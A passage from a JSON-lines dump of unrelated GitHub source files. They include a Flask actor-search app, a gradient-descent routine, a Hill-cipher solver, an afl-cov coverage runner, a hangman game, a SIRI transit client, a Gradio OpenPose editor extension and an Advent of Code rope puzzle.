confirmed=\"confirmed-id1\")\n\n elif ((len(target) > 20) and (target != None) and (source != None)):\n confirmation = Markup(target)\n target = None\n return render_template('confirmation.html',\n confirmation=confirmation, errors=errors, number=\"2\",\n actor1=actor1, actor2=actor2, confirmed=\"confirmed-id2\")\n\n except:\n confirmation = \"\"\n errors += \"Not a valid entry\"\n\n else:\n actor1 = request.form[\"actor-one\"]\n actor2 = request.form[\"actor-two\"]\n duplicate = request.form[\"duplicate\"]\n\n if (duplicate == \"1\"):\n actor_id = 
str(request.form[\"confirmed-id1\"])\n source = confirm(request.form[\"actor-one\"], actor_id)\n if source is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n target = person_id_for_name(actor2)\n elif (duplicate == \"2\"):\n actor_id = str(request.form[\"confirmed-id2\"])\n target = confirm(actor2, actor_id)\n if target is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n source = person_id_for_name(actor1)\n else:\n actor_id1 = str(request.form[\"confirmed-id1\"])\n actor_id2 = str(request.form[\"confirmed-id2\"])\n source = confirm(actor1, actor_id1)\n target = confirm(actor2, actor_id2)\n if source is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n if target is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n\n if source is not None and target is not None:\n result = display_result(source, target)\n value = Markup(result)\n return render_template('result.html', result=value)\n return render_template('index.html', confirmation=confirmation, errors=errors)\n\nif __name__==\"__main__\":\n app.run()\n","repo_name":"nmsulliv/degrees-of-separation","sub_path":"mysite/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25505155308","text":"import numpy as np\n \ndef min_gd(fun,x0,grad,args=()):\n alpha=0.3\n beta=0.8\n x=x0\n #cnt=1\n while(np.linalg.norm(grad(x,*args))>0.00001):\n dir=(-1)*grad(x,*args)\n t=1\n while(fun(x+t*dir,*args)>=(fun(x,*args)+(-1)*alpha*t*(np.linalg.norm(grad(x,*args))**2))):\n t=t*beta\n #print(\"iteration\",cnt,\"t=\",t)\n x=x+t*dir\n #cnt=cnt+1\n return x","repo_name":"gpustat/Convex_optimization","sub_path":"projects/backtracking line search/gradient_descent_smp4.py","file_name":"gradient_descent_smp4.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2180652110","text":"# Pranav Salunke\nraise NotImplementedError(\"affineMatrix has not been completed yet. I am working on it! 
I will update the repository when it is completed!\")\nimport numpy as np\n\n\ndef bruteForceInverse(a, m):\n for i in range(1, m):\n if (a * i) % m == 1:\n return i\n return None\n\n\ndef matrixToNumString(matrix):\n s = \"\"\n for a, b in zip(matrix[0], matrix[1]):\n s += \" \"\n s += str(a)\n s += \" \"\n s += str(b)\n s = s.strip()\n return s\n\n\ndef numStringToText(alphabet, numstring):\n s = \"\"\n numarr = numstring.split()\n for n in numarr:\n s += alphabet[int(n)]\n return s\n\n\ndef textStringToMatrix(alphabet, string):\n top = []\n bottom = []\n for i in range(len(string)):\n n = alphabet.find(string[i])\n if i % 2 == 0:\n top.append(n)\n else:\n bottom.append(n)\n\n if len(top) > len(bottom):\n n = alphabet.find(\" \")\n bottom.append(n)\n\n return np.array([top, bottom])\n\n\ndef flippityFlopPart(matrix):\n a = matrix[0][0]\n b = matrix[0][1]\n c = matrix[1][0]\n d = matrix[1][1]\n\n t = a\n a = d\n d = t\n\n b = -b\n c = -c\n return np.array([[a, b], [c, d]])\n\n\ndef main():\n e1 = 0\n e2 = 0\n e3 = 0\n e4 = 0\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ ,.?\"\n # from hw question 5.2\n text = \"U?DIPPWKCKIKFBWZERRXTV AXN,FG.SAYCHYVTMIMBG.LHTV KCPEAF?.FSGGZ.YOQMZQL.DWKLHYCHIVT,REEKQMJSLEAFXWWVFMKQQUQEWOQHI .BOG.UN.JGNIZQYESRMOQGNWMTVZHF,OKQYZQBLVNQ.MJSLMKQQUQRXKMJEG.ZH WRM.HYNDV,REE,RGBJR.F?NFHMHGHSFMKTZPDKA?EVJEM W?T MDOYU.FSFYCKWSHKNGEG.LH?NFHMHGHSFOQCCESRM?N,RZBE,.HZZQLIHWWCZ.KHIIJOWIHW..HQQUQUNRMJR.F?TWANUEGSEGTSHFXWZGHDOOQGNVFMKWE,MBFE,.H,XOQWKZBOTRZON.ECJQLWZFXWZQQUQ.GMZCIG.VZKWV.Q.NXVTG.QQUQ.USFMKBOBFEM WYCHIVTJR.FJLVZGNMJSL?Z QIOWCESRMSFSWSEYRWK\"\n # from example 5.4\n # text = \"CU.TG CGNFCG.?BK\"\n C = textStringToMatrix(alphabet, text)\n\n for e1 in range(2): # test all 16 cases\n for e2 in range(2):\n for e3 in range(2):\n for e4 in range(2):\n # get matrix A for that case\n # for text from hw question 5.2\n A = np.array([[14 + (15 * e1), 5 + (15 * e2)], [3 + (15 * e3), 11 + (15 * e4)]])\n # from example 5.4\n # A = np.array([[9 + (15 * e1), 1 + (15 * e2)], [13 + (15 * e3), 4 + (15 * e4)]])\n\n # get det A to see if it is invertable in mod 30 (30 is hard coded for now)\n det = int(round(np.linalg.det(A)))\n det = det % 30\n detinv = bruteForceInverse(det, 30)\n if detinv is not None:\n print(\"%d %d %d %d\" % (e1, e2, e3, e4))\n Achanged = flippityFlopPart(A)\n Ainv = (detinv * Achanged) % 30 # find A^-1\n P = (Ainv.dot(C)) % 30 # get matrix for plain text\n s = matrixToNumString(P)\n print(numStringToText(alphabet, s)) # convert number matrix to string\n\n\nmain()\n","repo_name":"PranavSalunke/Cryptography-Systems","sub_path":"affineMatrix.py","file_name":"affineMatrix.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39832323869","text":"#!/usr/bin/env python3.7\nimport logging\nimport subprocess\nimport threading\nimport argparse\nimport sys\nimport socketserver\nimport os\nfrom glob import glob\nfrom time import sleep\nfrom functools import partial\nfrom utils import *\n\n# TODO how to properly manage loggers without messing with the root logger?\nlogging.basicConfig(level=logging.WARNING, format=\"%(asctime)s | %(name)s | %(message)s\",\n datefmt='%Y-%d-%m %H:%M:%S')\n\n\ndef start_cov_and_serve(target_cmd: str, fuzz_out_dir: str, cov_dir: str, web_port: int):\n \"\"\"\n Starts threads for afl-cov and python http.server\n :param target_cmd: Command-line to start the target program\n :param fuzz_out_dir: Absolute path of directory passed to afl-fuzz -o 
switch\n :param cov_dir: Absolute path to project root of the coverage build\n :param web_port: Port to serve the web report on\n :return: None\n \"\"\"\n threads = list()\n\n # Start http.server\n srv_thread = threading.Thread(target=run_webserver, args=(fuzz_out_dir, web_port))\n srv_thread.start()\n threads.append(srv_thread)\n\n # Start afl-cov\n cov_thread = threading.Thread(target=run_afl_cov, args=(target_cmd, fuzz_out_dir, cov_dir))\n cov_thread.start()\n threads.append(cov_thread)\n\n # Once the afl-cov thread exits, we assume something has gone wrong or that the\n # user wants to exit\n for t in threads:\n t.join()\n\n\ndef run_afl_cov(target_cmdline: list, fuzz_out_dir: str, cov_dir: str):\n logger = logging.getLogger('AFL-COV')\n logger.warning(f\"Starting afl-cov\")\n\n # Create a cmdline string that contains the full path to the bin\n bin_path = os.path.realpath(os.path.join(cov_dir, target_cmdline[0]))\n tgt_cmd = f'{bin_path} {\" \".join(target_cmdline[1:])}'\n if '@@' in tgt_cmd:\n # afl-cov uses \"AFL_FILE\" instead of \"@@\"\n tgt_cmd = tgt_cmd.replace('@@', 'AFL_FILE')\n else:\n # handle cases where the bin reads from stdin\n tgt_cmd = f'cat AFL_FILE | {tgt_cmd}'\n\n cov_args = ['/usr/bin/afl-cov', '-d', fuzz_out_dir, '--live', '--overwrite', '--lcov-web-all', '--coverage-cmd', tgt_cmd, '--code-dir', cov_dir]\n proc = subprocess.Popen(cov_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # Quick check to see if we immediately died for some reason\n try:\n dead = True\n proc.wait(3.0)\n except subprocess.TimeoutExpired:\n dead = False\n pass\n finally:\n if dead:\n outs, errs = proc.communicate(timeout=1)\n if outs:\n die(outs.decode())\n if errs:\n die(errs.decode())\n\n # Parse afl-cov output so we can log each message in blocks instead of line by line\n block = []\n found_coverage = False\n logger.warning('Collecting code coverage')\n #import pdb; pdb.set_trace()\n for line in iter(proc.stdout.readline, b\"\"):\n line = line.decode().strip()\n\n # Handle the various types of messages afl-cov logs\n if '[-]' in line:\n logger.debug(line.lstrip('[-] '))\n elif '[*]' in line:\n logger.warning(line.lstrip('[*] '))\n elif 'coverage' in line:\n if \"'line'\" in line:\n # Line coverage can be very verbose\n logger.debug(line)\n else:\n logger.info(line)\n else:\n logger.debug(line)\n\n # Check if anything went wrong\n proc.wait()\n if proc.returncode != 0:\n logger.critical(\"afl-cov returned non-zero exit code: %d\" % proc.returncode)\n logger.critical(\"Failed command: \" + ' '.join(proc.args))\n\n\ndef run_webserver(fuzz_out_dir, port):\n web_dir = f'{fuzz_out_dir}/cov/web'\n handler_class = partial(RequestHandler, directory=web_dir)\n socketserver.TCPServer.allow_reuse_address = True\n\n logger = logging.getLogger('WEB-SRV')\n logger.debug(f'Web directory is set to {web_dir}')\n logger.warning('Waiting for web report to be created...')\n\n # We need to hang out until the web report exists\n while not os.path.exists(f'{web_dir}/index.html'):\n sleep(1)\n\n with socketserver.TCPServer(('0.0.0.0', port), handler_class) as httpd:\n logger.warning('Web report created. 
Serving on port %d' % port)\n httpd.serve_forever()\n\n\ndef init_parser(add_help=True):\n parser = argparse.ArgumentParser(description='Run afl-cov and serve the web report', add_help=add_help)\n parser.add_argument('--cov-dir', default='./*-cov',\n help='absolute path to the dir containing the coverage build')\n parser.add_argument('--port', type=int, default=8000,\n help='port on which to serve the web report')\n parser.add_argument('--exec', dest='cmdline', metavar='target_cmdline', nargs='*',\n required=True, help='./relative_path/the_bin -a arg @@')\n\n return parser\n\n\ndef validate_args(args):\n try: \n args.cov_dir = resolve_glob(args.cov_dir)\n args.cov_cmdline = resolve_cmdline_path(args.cov_dir, args.cmdline)\n except FileNotFoundError as e:\n die(e)\n\n\nif __name__ == \"__main__\":\n parser = init_parser()\n\n # Add args that conflict with afl-fuzz runner script\n parser.add_argument('-o', default='/fuzz_out',\n help='absolute path to the fuzzer output directory')\n parser.add_argument(\"-v\", action=\"count\", help=\"increase output verbosity\")\n args = parser.parse_args()\n\n validate_args(args)\n\n # Set root logger level (default = WARN, -v = INFO, -vv+ = DEBUG)\n if not args.v:\n level = logging.WARN\n elif args.v == 1:\n level = logging.INFO\n else:\n level = logging.DEBUG\n\n logging.getLogger().setLevel(level)\n\n # Start up afl-cov and serve the web report\n start_cov_and_serve(args.cov_cmdline, args.fuzz_out, args.cov_dir, args.port)\n","repo_name":"dlmarrero/sweet-fuzz","sub_path":"src/covrunner.py","file_name":"covrunner.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"18686373690","text":"import bottle\nimport model\n\nvislice = model.Vislice('stanje.json')\n\nvislice = model.Vislice()\n#id = vislice.nova_igra()\n#igra, stanje = vislice.igre[id]\n#vislice.ugibaj(id, 'A')\n#vislice.ugibaj(id, 'K')\n#vislice.ugibaj(id, 'U')\n#vislice.ugibaj(id, 'L')\n\n\n@bottle.get('/')\ndef index():\n return bottle.template('index.tpl') \n\n\n#@bottle.get('/igra/')\n#def testigra():\n# return bottle.template('igra.html', id_igre=id, igra=igra, stanje=stanje) WE WERE JUST PLAYING AROUND WITH THIS\n\n#type localhost:8080 into the browser and the game is there\n#this function makes certain routes (/img/...) display a picture:\n\n@bottle.get('/img/<ime>')\ndef slike(ime):\n return bottle.static_file(ime, root = 'img') \n\n@bottle.post('/nova_igra/') #set a cookie\ndef nova_igra_2():\n id_igre = vislice.nova_igra()\n bottle.response.set_cookie('id_igre', str(id_igre), path='/')\n bottle.redirect('/igra/')\n\n@bottle.get('/igra/')\ndef pokazi_igro_2():\n id_igre = int(bottle.request.get_cookie('id_igre'))\n igra, stanje = vislice.igre[id_igre]\n return bottle.template('igra.html', id_igre=id_igre, igra=igra, stanje=stanje)\n\n@bottle.post('/igra/')\ndef ugibaj_2():\n id_igre = int(bottle.request.get_cookie('id_igre'))\n crka = bottle.request.forms.getunicode('crka')\n vislice.ugibaj(id_igre, crka)\n print(crka)\n bottle.redirect('/igra/')\n#POST changes state, GET does not\nbottle.run(reloader=True, debug=True)\n\n\n\n\n\n","repo_name":"reginab98/Vislice","sub_path":"vislice.py","file_name":"vislice.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"1399155933","text":"\"siri.py: Basic implementation of a SIRI-SM client, with Israel Ministry of Transportation quirks\"\n# Copyright (C) 2016, 2018 Elad 
Alfassa \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# SPDX-License-Identifier: GPL-3.0-or-later\n\nfrom typing import Dict, List\nimport aiohttp\nimport dateutil.parser\nimport dateutil.tz\nimport json\nimport time\nfrom aiocache import SimpleMemoryCache\nfrom aiocache.base import BaseCache\nfrom itertools import zip_longest\nGROUP_SIZE = 120\n\nURL = None\n\n\ndef _listify(obj):\n \"\"\" Wrap the object in a list if it's not a list \"\"\"\n if isinstance(obj, list):\n return obj\n else:\n return [obj]\n\n\ndef _grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n # From itertools recipies: https://docs.python.org/3/library/itertools.html\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\n\nclass SIRIResponse(object):\n def __init__(self, json_response: Dict, stop_codes: List[str], verbose=False):\n if verbose:\n print(json.dumps(json_response, indent=2))\n\n self.visits: Dict[str, List[SIRIStopVisit]] = {}\n \"\"\" Stop visits. A dictionary in the form of {stop_code: SIRIStopVisit} \"\"\"\n self.errors: List[str] = []\n \"\"\" Errors, if any\"\"\"\n\n for stop_code in stop_codes:\n self.visits[str(stop_code)] = []\n\n # ew.\n try:\n response = json_response['Siri']['ServiceDelivery']\n except KeyError:\n print(json.dumps(json_response, indent=2))\n raise\n\n self.timestamp = response['ResponseTimestamp']\n \"\"\" Timestamp of the response from the server \"\"\"\n\n if 'StopMonitoringDelivery' in response:\n for delivery in _listify(response['StopMonitoringDelivery']):\n if delivery['Status'] != \"true\":\n # TODO actually log errors!\n self.errors.append(delivery['ErrorCondition']['Description'])\n elif 'MonitoredStopVisit' in delivery:\n for visit in _listify(delivery['MonitoredStopVisit']):\n stop_visit = SIRIStopVisit(visit)\n self.visits[stop_visit.stop_code].append(stop_visit)\n\n def to_dict(self) -> dict:\n \"\"\" Serialize to a dict format which is more readable than the original source \"\"\"\n visits = {k: [visit.to_dict() for visit in v] for k, v in self.visits.items()}\n return {\"errors\": self.errors if len(self.errors) > 0 else None,\n \"timestamp\": str(self.timestamp),\n \"visits\": visits}\n\n def append(self, other):\n \"\"\" Append visits and error from a different response into this response \"\"\"\n if not isinstance(other, SIRIResponse):\n raise TypeError(\"Expected a SIRIResponse object\")\n self.errors += other.errors\n for stop_code, visits in other.visits.items():\n if stop_code in self.visits:\n for visit in visits:\n if not any(my_visit == visit for my_visit in self.visits[stop_code]):\n # a new visit! 
let's append it\n self.visits[stop_code].append(visit)\n else:\n self.visits[stop_code] = visits\n\n\nclass CachedSIRIResponse(SIRIResponse):\n \"\"\" a SIRI response that was taken entirely from the cache \"\"\"\n def __init__(self, visits):\n self.errors = []\n self.visits: Dict[str, List[SIRIStopVisit]] = visits\n self.timestamp = None\n\n # find a timestamp in one of the stops in this cache entry:\n for stop_visits in visits.values():\n if len(stop_visits) > 0:\n self.timestamp = stop_visits[0].timestamp\n break\n\n\nclass SIRIClient(object):\n \"\"\" SIRI-SM client using aiohttp \"\"\"\n def __init__(self, url: str, user_id: str, cache: BaseCache = None,\n cache_ttl: int = 30, verbose: bool = False):\n self.url = url\n self.user_id = user_id\n self.verbose = verbose\n self.cache_ttl = cache_ttl\n self._cache = cache if cache is not None else SimpleMemoryCache()\n self._connector = None\n\n async def request(self, stop_codes: List[str], max_visits: int = 50) -> SIRIResponse:\n \"\"\" Request real time information for stops in `stop_codes` \"\"\"\n # Look for stop_codes in cache\n to_request = []\n from_cache = []\n for stop in stop_codes:\n cached = await self._cache.get(f\"realtime:{stop}\")\n if cached is None:\n to_request.append(stop)\n else:\n from_cache.append((stop, cached))\n\n headers = {'Accept': 'application/json',\n 'Accept-Encoding': 'gzip,deflate'}\n async with aiohttp.ClientSession() as session:\n ret = None\n for group in _grouper(to_request, GROUP_SIZE):\n group = list(filter(None, group))\n params = {\n \"Key\": self.user_id,\n \"MonitoringRef\": ','.join(group),\n }\n async with session.get(self.url, params=params, headers=headers) as raw_response:\n try:\n json_response = await raw_response.json(encoding=\"utf-8\")\n except UnicodeDecodeError:\n json_response = await raw_response.json()\n except aiohttp.ContentTypeError as e:\n print('Content type error', e)\n print(await raw_response.text())\n raise e\n\n response = SIRIResponse(json_response, group, self.verbose)\n if ret:\n # Merge SIRIResponse objects if we have more than\n # one group\n if response.errors:\n print(response.errors)\n ret.append(response)\n else:\n ret = response\n if ret is not None:\n # cache new visits\n for stop_code, visits in ret.visits.items():\n await self._cache.set(f\"realtime:{stop_code}\", visits, ttl=self.cache_ttl)\n # add cached visits to the response\n for stop_code, visits in from_cache:\n ret.visits[stop_code] = visits\n else:\n ret = CachedSIRIResponse(dict(from_cache))\n return ret\n
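\n\n# Illustrative sketch (added commentary; not part of the original client): how\n# request() batches stop codes. GROUP_SIZE and _grouper are defined above; the\n# stop codes below are invented examples.\ndef _grouper_batching_example():\n \"\"\" Show how a five-stop request is split into padded groups (toy size 2). \"\"\"\n codes = [\"100\", \"200\", \"300\", \"400\", \"500\"]\n groups = [list(filter(None, g)) for g in _grouper(codes, 2)]\n # zip_longest pads the last group with None; filter(None, ...) drops the\n # padding, mirroring what SIRIClient.request() does before building a query.\n assert groups == [[\"100\", \"200\"], [\"300\", \"400\"], [\"500\"]]\n return groups\n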
\"\"\"\n\n self.destination_id = journey['DestinationRef']\n \"\"\" The stop code of this trip's destination \"\"\"\n\n try:\n vehicle_ref = journey['VehicleRef']\n except KeyError:\n vehicle_ref = None\n self.vehicle_ref = vehicle_ref\n \"\"\" In case of Israel Railways, this is the train number and is guranteed to be unique per day\n For buses, this is either the license plate number, or the internal vehicle number \"\"\"\n\n # Assuming singular MonitoredCall object.\n # need to change that assumption if the \"onward calls\" feature of version 2.8 will ever be used\n call = journey['MonitoredCall']\n self.eta = dateutil.parser.parse(call['ExpectedArrivalTime'])\n \"\"\" Estimated time for arrival \"\"\"\n\n # Convert SIRI - style trip ID to GTFS style, to make it useful\n\n if 'FramedVehicleJourneyRef' in journey:\n journey_ref = journey['FramedVehicleJourneyRef']\n\n tripdate = dateutil.parser.parse(journey_ref['DataFrameRef'])\n tripdate = tripdate.strftime('%d%m%y')\n\n trip_id_part = journey_ref['DatedVehicleJourneyRef']\n\n trip_id = f\"{trip_id_part}_{tripdate}\"\n else:\n trip_id = None\n self.trip_id = trip_id\n \"\"\" Trip ID, unique identifier of this trip per day \"\"\"\n\n try:\n status = call['ArrivalStatus']\n except KeyError:\n status = None\n self.status = status\n \"\"\" Can be None, or a string: OnTime, early, delayed, cancelled, arrived, noReport. Only relevant for Israel Railways? \"\"\"\n\n self.departed = None\n \"\"\" The aimed departure time from the origin station. In some edge case, this is slightly different then the GTFS schedule \"\"\"\n\n if 'AimedDepartureTime' in call:\n self.departed = dateutil.parser.parse(call['AimedDepartureTime'])\n elif 'OriginAimedDepartureTime' in journey:\n self.departed = dateutil.parser.parse(journey['OriginAimedDepartureTime'])\n else:\n self.departed = None\n\n if \"VehicleLocation\" in journey:\n self.location = {'lat': journey[\"VehicleLocation\"][\"Latitude\"],\n 'lon': journey[\"VehicleLocation\"][\"Longitude\"]}\n else:\n self.location = None\n\n self.static_info = None\n \"\"\" Placeholder for plugging static GTFS schedule info \"\"\"\n\n def __repr__(self):\n return \"SIRIStopVisit \".format(self.line_id, self.eta)\n\n def __eq__(self, other):\n return (self.producer == other.producer\n and self.stop_code == other.stop_code\n and self.timestamp == other.timestamp\n and self.eta == other.eta\n and self.route_id == other.route_id\n and self.vehicle_ref == other.vehicle_ref\n and self.direction_id == other.direction_id)\n\n def to_dict(self) -> dict:\n ret = {}\n for key, value in self.__dict__.items():\n if key.startswith(\"_\"):\n continue\n if isinstance(value, (int, str, type(None), dict)):\n ret[key] = value\n elif callable(getattr(value, \"to_dict\", None)):\n ret[key] = value.to_dict()\n else:\n ret[key] = str(value)\n return ret\n","repo_name":"elad661/curlbus","sub_path":"curlbus/siri.py","file_name":"siri.py","file_ext":"py","file_size_in_byte":11592,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"7268800560","text":"import json\nimport os.path\nimport pathlib\nimport typing\nimport urllib.parse\n\nimport gradio as gr\n\n# Get the base directory of the extension\ntry:\n root_path = pathlib.Path(__file__).resolve().parents[1]\nexcept NameError:\n import inspect\n\n root_path = pathlib.Path(inspect.getfile(lambda: None)).resolve().parents[1]\n\n\ndef get_asset_url(\n file_path: pathlib.Path, append: typing.Optional[dict[str, str]] = None\n) -> str:\n 
\"\"\"Generate a URL with a query string to prevent caching.\"\"\"\n if append is None:\n append = {\"v\": str(os.path.getmtime(file_path))}\n else:\n append = append.copy()\n append[\"v\"] = str(os.path.getmtime(file_path))\n return f\"/file={file_path.absolute()}?{urllib.parse.urlencode(append)}\"\n\n\ndef write_config_file() -> pathlib.Path:\n \"\"\"Write configuration file to be passed in the iframe query string.\"\"\"\n # Models and poses\n assets = {\n \"models/hand.fbx\": get_asset_url(root_path / \"models\" / \"hand.fbx\"),\n \"models/foot.fbx\": get_asset_url(root_path / \"models\" / \"foot.fbx\"),\n \"src/poses/data.bin\": get_asset_url(root_path / \"src\" / \"poses\" / \"data.bin\"),\n }\n\n # MediaPipe Pose files\n MEDIAPIPE_POSE_VERSION = \"0.5.1675469404\"\n mediapipe_dir = root_path / \"downloads\" / \"pose\" / MEDIAPIPE_POSE_VERSION\n for file_name in [\n \"pose_landmark_full.tflite\",\n \"pose_web.binarypb\",\n \"pose_solution_packed_assets.data\",\n \"pose_solution_simd_wasm_bin.wasm\",\n \"pose_solution_packed_assets_loader.js\",\n \"pose_solution_simd_wasm_bin.js\",\n ]:\n file_path = mediapipe_dir / file_name\n if not file_path.exists():\n continue\n assets[file_name] = get_asset_url(file_path.absolute())\n\n # Write configuration file\n consts = {\"assets\": assets}\n config_dir = root_path / \"downloads\"\n config_dir.mkdir(mode=0o755, parents=True, exist_ok=True)\n config_path = config_dir / \"config.json\"\n config_path.write_text(json.dumps(consts))\n return config_path\n\n\ndef on_ui_tabs():\n \"\"\"WebUI callback: Create tab\"\"\"\n with gr.Blocks(analytics_enabled=False) as blocks:\n create_ui()\n return [(blocks, \"3D Openpose\", \"threedopenpose\")]\n\n\ndef create_ui():\n \"\"\"Create tab\"\"\"\n try:\n from modules.shared import opts\n\n use_online: bool = opts.openpose3d_use_online_version\n cn_max: int = opts.control_net_max_models_num\n except (ImportError, AttributeError):\n # Values when this script is run standalone or if controlnet is not installed\n cn_max = 0\n use_online = False\n\n if use_online:\n html_url = \"https://zhuyu1997.github.io/open-pose-editor/\"\n else:\n config = {\"config\": get_asset_url(write_config_file())}\n html_url = get_asset_url(root_path / \"pages\" / \"index.html\", config)\n\n with gr.Tabs(elem_id=\"openpose3d_main\"):\n with gr.Tab(label=\"Edit Openpose\"):\n gr.HTML(\n f\"\"\"\n \n \"\"\"\n )\n gr.Markdown(\n \"Online version: [Online 3D Openpose Editor](https://zhuyu1997.github.io/open-pose-editor/)\"\n )\n with gr.Tab(label=\"Send to ControlNet\"):\n with gr.Row():\n send_t2i = gr.Button(value=\"Send to txt2img\", variant=\"primary\")\n send_i2i = gr.Button(value=\"Send to img2img\", variant=\"primary\")\n with gr.Row():\n cn_dropdown_list = [str(i) for i in range(cn_max)]\n cn_dropdown_list.insert(0, \"-\")\n with gr.Column(variant=\"panel\"):\n pose_image = gr.Image(\n label=\"Pose\",\n elem_id=\"openpose3d_pose_image\",\n )\n with gr.Row():\n pose_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"0\" if cn_max >= 1 else \"-\",\n )\n pose_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n depth_image = gr.Image(\n label=\"Depth\",\n elem_id=\"openpose3d_depth_image\",\n )\n with gr.Row():\n depth_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"1\" if cn_max >= 2 else \"-\",\n )\n depth_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n normal_image = gr.Image(\n 
label=\"Normal\",\n elem_id=\"openpose3d_normal_image\",\n )\n with gr.Row():\n normal_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"2\" if cn_max >= 3 else \"-\",\n )\n normal_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n canny_image = gr.Image(\n label=\"Canny\",\n elem_id=\"openpose3d_canny_image\",\n )\n with gr.Row():\n canny_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"3\" if cn_max >= 4 else \"-\",\n )\n canny_download = gr.Button(value=\"Download\")\n\n send_cn_inputs = [\n pose_image,\n pose_target,\n depth_image,\n depth_target,\n normal_image,\n normal_target,\n canny_image,\n canny_target,\n ]\n send_t2i.click(\n None,\n send_cn_inputs,\n None,\n _js=\"window.openpose3d.sendTxt2img\",\n )\n send_i2i.click(\n None,\n send_cn_inputs,\n None,\n _js=\"window.openpose3d.sendImg2img\",\n )\n pose_download.click(\n None,\n pose_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'pose')\",\n )\n depth_download.click(\n None,\n depth_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'depth')\",\n )\n normal_download.click(\n None,\n normal_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'normal')\",\n )\n canny_download.click(\n None,\n canny_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'canny')\",\n )\n\n\ndef on_ui_settings():\n \"\"\"WebUI callback: Create setting tab\"\"\"\n from modules.shared import OptionInfo, opts\n\n section = (\"openpose3d\", \"3D Openpose Editor\")\n\n opts.add_option(\n \"openpose3d_use_online_version\",\n OptionInfo(False, \"Use online version\", section=section),\n )\n\n\ndef main():\n \"\"\"Main function called when this script is run standalone.\"\"\"\n js_path = root_path / \"javascript\" / \"index.js\"\n css_path = root_path / \"style.css\"\n\n # JavaScript functions to simulate WebUI\n head = \"\"\"\n \n \"\"\"\n head += f\"\"\"\n \n \"\"\"\n\n # Simulate CSS loading of the WebUI\n original_template_response = gr.routes.templates.TemplateResponse\n\n def template_response(*args, **kwargs):\n res = original_template_response(*args, **kwargs)\n res.body = res.body.replace(b\"\", f\"{head}\".encode(\"utf8\"))\n res.init_headers()\n return res\n\n gr.routes.templates.TemplateResponse = template_response\n\n # Create tab\n with gr.Blocks(analytics_enabled=False, css=css_path.read_text()) as blocks:\n with gr.Tab(label=\"3D Openpose\", elem_id=\"tab_threedopenpose\"):\n create_ui()\n blocks.launch()\n\n\ntry:\n # Register callbacks when called from the WebUI\n from modules import script_callbacks\n\n script_callbacks.on_ui_tabs(on_ui_tabs)\n script_callbacks.on_ui_settings(on_ui_settings)\nexcept ImportError:\n # Call the main function when this script is run standalone\n main()\n","repo_name":"ZhUyU1997/open-pose-editor","sub_path":"scripts/openpose_editor_3d.py","file_name":"openpose_editor_3d.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":592,"dataset":"github-code","pt":"40"} +{"seq_id":"42840308769","text":"from pprint import pprint\nfrom typing import Tuple, Set\n\n# input = \"\"\"R 4\n# U 4\n# L 3\n# D 1\n# R 4\n# D 1\n# L 5\n# R 2\n# \"\"\"\n\n# input = \"\"\"R 5\n# U 8\n# L 8\n# D 3\n# R 17\n# D 10\n# L 25\n# U 20\n# \"\"\"\n#\nwith open(\"input9.txt\", \"r\") as fp:\n input = fp.read()\n\nrope = [(0, 0)] * 10\ntail_positions: Set[Tuple[int, int]] = {rope[-1]}\n\n\ndef update_tail(head: 
